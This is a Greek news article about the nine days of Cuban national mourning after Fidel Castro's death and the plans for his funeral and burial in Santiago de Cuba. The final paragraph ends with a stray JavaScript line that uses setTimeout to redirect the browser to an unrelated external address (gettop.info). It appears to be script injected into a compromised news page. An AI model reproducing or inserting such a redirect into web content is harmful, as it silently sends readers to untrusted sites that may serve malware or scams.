Στις 4 Δεκεμβρίου η κηδεία του Φιντέλ Κάστρο

0
11
TORONTO, ON: Fidel Castro. Photo taken by Boris Spremo/Toronto Star Feb. 1, 1976. (Boris Spremo/Toronto Star via Getty Images)

 

Εννέα ημέρες εθνικό πένθος κήρυξαν οι κουβανικές Αρχές μετά τον θάνατο του ηγέτη της κουβανικής επανάστασης, ο θάνατος του οποίου βύθισε στο πένθος όλη τη χώρα.

Στο λιτό ανακοινωθέν από το Συμβούλιο του Κράτους αναφέρεται «εθνικό πένθος εννέα ημερών από το Σάββατο (σήμερα) έως την Κυριακή 4 Δεκεμβρίου. Στη διάρκειά του θα διακοπούν όλες οι δραστηριότητες και τα δημόσια θεάματα».

Σύμφωνα με δημοσίευμα του βρετανικού Guardian οι στάχτες του Κάστρο θα ενταφιαστούν στο νεκροταφείο Σάντα Ιφιγένεια στο Σαντιάγο ντε Κούβα στις 4 Δεκεμβρίου, ενώ οι Κουβανοί θα τιμήσουν τον εκλιπόντα ηγέτη τους στις 28 και 29 Νοεμβρίου στο μνημείο Χοσέ Μαρτί στην Αβάνα, ενώ παράλληλα στις 29 Νοεμβρίου θα γίνει πορεία στην Αβάνα στις 19.00.

Την επόμενη ημέρα, οι στάχτες του Κάστρο θα ξεκινήσουν την πορεία τους για το «τελευταίο ταξίδι» του ηγέτη κατά μήκος της διαδρομής που τιμά τη νίκη του το 1959.

Στις 4 Δεκεμβρίου, στις 7 το πρωί, οι στάχτες του θα ενταφιαστούν στο νεκροταφείο Σάντα Ιφιγένεια.

Οι κουβανικές αρχές κήρυξαν το Σάββατo εθνικό πένθος εννέα ημερών λίγες ώρες μετά τον θάνατο του ηγέτη της κουβανικής επανάστασης, σε ηλικία 90 ετών.

Το συμβούλιο του Κράτους κήρυξε σε λακωνικό ανακοινωθέν που εξέδωσε «εθνικό πένθος εννέα ημερών» από το Σάββατο (σήμερα) έως την Κυριακή 4 Δεκεμβρίου οπότε θα γίνει η κηδεία του Κάστρο. Στη διάρκειά του θα διακοπούν «όλες οι δραστηριότητες και τα δημόσια θεάματα» διευκρινίζει το ανώτατο όργανο της κουβανικής κυβέρνησης.

Το νέο του θανάτου του Κάστρο διαδόθηκε τη νύχτα στους αραιούς από κόσμο δρόμους της Αβάνας, με πολλούς κατοίκους να δηλώνουν συντετριμμένοι από τον θάνατο του «κομαντάντε». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here